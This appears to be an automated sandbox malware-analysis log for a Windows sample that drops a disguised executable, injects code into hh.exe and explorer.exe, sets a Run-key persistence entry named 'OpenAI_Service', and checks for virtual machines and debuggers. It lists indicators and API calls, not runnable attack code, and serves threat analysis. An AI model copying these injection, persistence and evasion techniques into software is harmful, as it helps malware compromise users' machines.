Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: devenum.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\hh.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Section loaded: libcef.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Section loaded: msvcp140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Section loaded: vcruntime140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Section loaded: vcruntime140_1.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
Source: down.lnk.12.dr, LNK file: ..\..\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: nrGkqbCyKP.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: nrGkqbCyKP.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: nrGkqbCyKP.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000007.00000002.2079334826.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000016.00000002.2198959258.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000019.00000002.2199433518.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: Binary string: C:\projects\hydra\main\Release_X64\sceneProd\sceneSourceCef.pdb source: zfon.exe, zfon.exe, 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.dr
Source: Binary string: D:\code\personal\soft_distribute_tags\code\CSharpInstaller16\obj\Release\monodelphous.pdb source: nrGkqbCyKP.exe
Source: Binary string: d:\agent\_work\2\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000007.00000002.2080942034.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000016.00000002.2198134102.00007FFBAD2A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000019.00000002.2198456266.00007FFBAD2A2000.00000002.00000001.01000000.0000000C.sdmp, MSVCP140.dll.0.dr
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdb source: zfon.exe, 00000007.00000002.2059202761.0000026ADFDD5000.00000002.10000000.00040000.00000000.sdmp, zfon.exe, 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdbC source: zfon.exe, 00000007.00000002.2059202761.0000026ADFDD5000.00000002.10000000.00040000.00000000.sdmp, zfon.exe, 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000007.00000002.2079700917.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000016.00000002.2198621409.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000019.00000002.2199060774.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000007.00000002.2079700917.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000016.00000002.2198621409.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000019.00000002.2199060774.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000007.00000002.2079334826.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000016.00000002.2198959258.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000019.00000002.2199433518.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr

Data Obfuscation

Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Unpacked PE file: 7.2.zfon.exe.7ff79cfb0000.0.unpack
Source: nrGkqbCyKP.exe, Static PE information: 0xAF9558D9 [Mon May 7 21:53:29 2063 UTC]
Source: nrGkqbCyKP.exe, Static PE information: real checksum: 0xe5a4 should be: 0x14393
Source: zfon.exe.0.dr, Static PE information: real checksum: 0x0 should be: 0x293a39
Source: VCRUNTIME140.dll.0.dr, Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr, Static PE information: section name: _RDATA
Source: MSVCP140.dll.0.dr, Static PE information: section name: .didat
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe, Code function: 7_2_0000026ADFD684DB push dword ptr [esp+eax-76h]; ret 7_2_0000026ADFD684E0
Source: C:\Windows\hh.exe, Code function: 8_2_000001E47A9F00CF pushad ; iretd 8_2_000001E47A9F00D0
Source: C:\Windows\hh.exe, Code function: 8_2_000001E47C4F3CA9 push eax; ret 8_2_000001E47C4F3CAA
Source: C:\Windows\hh.exe, Code function: 8_2_000001E47C4F3D26 push eax; ret 8_2_000001E47C4F3D27
Source: C:\Windows\hh.exe, Code function: 8_2_000001E47C4F3D09 push eax; ret 8_2_000001E47C4F3D0A
Source: C:\Windows\explorer.exe, Code function: 12_2_00B700AE push esi; retf 12_2_00B700AD
Source: C:\Windows\explorer.exe, Code function: 12_2_00B700AE push esp; retf 12_2_00B700B8
Source: C:\Windows\explorer.exe, Code function: 12_2_00B7002D push esi; retf 12_2_00B700AD
Source: C:\Windows\explorer.exe, Code function: 12_2_00B7005B push esi; retf 12_2_00B700AD
Source: C:\Windows\explorer.exe, Code function: 12_2_0AAF5876 push ds; retf 12_2_0AAF5877
Source: C:\Windows\explorer.exe, Code function: 12_2_0AAF6172 push 8348FFFFh; ret 12_2_0AAF617A
Source: C:\Windows\explorer.exe, Code function: 12_2_0AAF77A1 push ebx; iretd 12_2_0AAF77A6

Persistence and Installation Behavior

Source: C:\Windows\hh.exe, File created: C:\ProgramData\kernelquick.sys
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, File created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\vcruntime140_1.dll
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, File created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\MSVCP140.dll
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, File created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcef
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, File created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\VCRUNTIME140.dll
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, File created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
Source: C:\Windows\explorer.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OpenAI_Service
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B66580 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00007FFBC1B66580
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\hh.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE VenkernalData_info
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\hh.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47F4-A11E-851B338CEFB8}Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeMemory allocated: 4990000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeWindow / User API: threadDelayed 2178Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeWindow / User API: threadDelayed 7659Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 1904Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 2940Jump to behavior
Source: C:\Windows\hh.exeWindow / User API: threadDelayed 4563Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 812Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 784Jump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeDropped PE file which has not been started: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcefJump to dropped file
Source: C:\Windows\hh.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeAPI coverage: 0.6 %
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeAPI coverage: 4.9 %
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeAPI coverage: 0.5 %
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -28592453314249787s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99875s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99656s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99437s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99328s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99218s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99109s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -99000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98891s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98766s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98656s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98437s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98328s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98219s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98109s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -98000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97891s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97780s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97671s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97562s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97453s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97344s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97234s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97124s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -97016s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96906s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96797s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96687s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96578s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96469s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96359s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96250s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96141s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -96031s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95907s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95670s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95520s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95281s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95108s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -95000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94887s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94672s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94562s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe TID: 2720Thread sleep time: -94453s >= -30000sJump to behavior
Source: C:\Windows\hh.exe TID: 6992Thread sleep count: 1904 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 6992Thread sleep time: -1904000s >= -30000sJump to behavior
Source: C:\Windows\hh.exe TID: 5960Thread sleep count: 2940 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 6992Thread sleep count: 4563 > 30Jump to behavior
Source: C:\Windows\hh.exe TID: 6992Thread sleep time: -4563000s >= -30000sJump to behavior
Source: C:\Windows\hh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B40E70 FindFirstFileExW,FindClose,wcscpy_s,6_2_00007FFBC1B40E70
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4EF350 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,CreateFileW,WriteFile,FindFirstFileW,_invalid_parameter_noinfo_noreturn,8_2_000001E47C4EF350
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 22_2_00007FFBAD260E70 FindFirstFileExW,FindClose,wcscpy_s,22_2_00007FFBAD260E70
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4E6370 gethostname,gethostbyname,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GetDriveTypeW,GetDiskFreeSpaceExW,GlobalMemoryStatusEx,GetNativeSystemInfo,K32GetProcessImageFileNameW,GetLogicalDriveStringsW,CoInitializeEx,CoCreateInstance,RegOpenKeyExW,GetLocaleInfoW,GetCurrentHwProfileW,RegOpenKeyExW,RegDeleteValueW,RegCreateKeyW,RegSetValueExW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,8_2_000001E47C4E6370
Source: explorer.exe, 0000000F.00000003.2146195587.0000000008EBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000008EBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.0000000008EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD Loopback Controller
Source: Amcache.hve.11.drBinary or memory string: VMware
Source: explorer.exe, 0000000C.00000002.2048969994.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: explorer.exe, 0000000F.00000003.2156818481.0000000007793000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Process information queried: ProcessInformation
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Process queried: DebugPort
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 6_2_00007FF79D074EE0 GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_00007FF79D074EE0
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Process token adjusted: Debug
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 6_2_00007FF79D0743EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF79D0743EC
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 6_2_00007FFBC1B04628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC1B04628
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 6_2_00007FFBC1B20AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC1B20AD8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 6_2_00007FFBC1B7D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC1B7D460
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 22_2_00007FF79D0743EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF79D0743EC
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 22_2_00007FFBAD29D460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFBAD29D460
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 22_2_00007FFBB50E0AD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFBB50E0AD8
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Code function: 22_2_00007FFBBC154628 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFBBC154628
Source: C:\Users\user\Desktop\nrGkqbCyKP.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Memory allocated: C:\Windows\hh.exe base: 1E47A9F0000 protect: page read and write
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Memory allocated: C:\Windows\explorer.exe base: B70000 protect: page execute and read and write
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe Memory allocated: C:\Windows\explorer.exe base: B30000 protect: page read and write
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe NtUnmapViewOfSection: Indirect: 0x7FF79D0E9162
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe NtMapViewOfSection: Indirect: 0x7FF79D0E91CE
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe NtMapViewOfSection: Indirect: 0x7FF79D0E8C91
